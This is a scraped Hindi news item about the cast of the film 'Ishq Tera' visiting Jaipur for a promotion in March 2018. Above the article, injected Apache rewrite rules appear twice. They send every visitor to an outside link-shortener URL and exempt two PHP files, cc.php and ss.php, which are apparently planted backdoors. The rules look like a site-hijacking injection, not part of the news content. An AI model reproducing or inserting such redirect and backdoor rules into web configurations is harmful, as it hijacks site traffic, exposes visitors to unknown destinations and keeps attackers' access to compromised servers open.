
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 697
Previous Nextजयपुर। फिल्म ‘इश्क तेरा’ के स्टार कास्ट कल जयपुर आएंगे और विभिन्न स्थानों पर फैन्स से रूबरू होंगे। वे फिल्म के प्रमोशन के सिलसिले में आ रहे हैं। फिल्म निर्देशक जोजो डिसूजा के निर्देशन में बनी फिल्म ‘‘इश्क तेरा’’ के प्रमोशन के लिए फिल्म की स्टार कास्ट गुरूवार 29 मार्च 2018 को जयपुर आ रहे हैं। फिल्म की स्टार कास्ट टीम में मुख्य अभिनेत्री हर्षिता भट्ट और मनोज पाहवा जयपुर आएंगे और शहर में विभिन्न स्थानों पर फैन्स के बीच जाकर फिल्म का प्रमोशन करेंगे। दोपहर 2.30 बजे दोनों अभिनेता राजापार्क स्थित सैलून में मीडिया और फैन्स से मुलाकात करेंगे। उल्लेखनीय है कि फिल्म में हर्षिता भट्ट के अपोजिट लीड रोल में मोहित मदान ने अभिनय किया है, वहीं अन्य कलाकारों में दीक्षा सिंह और अमन वर्मा शामिल हैं।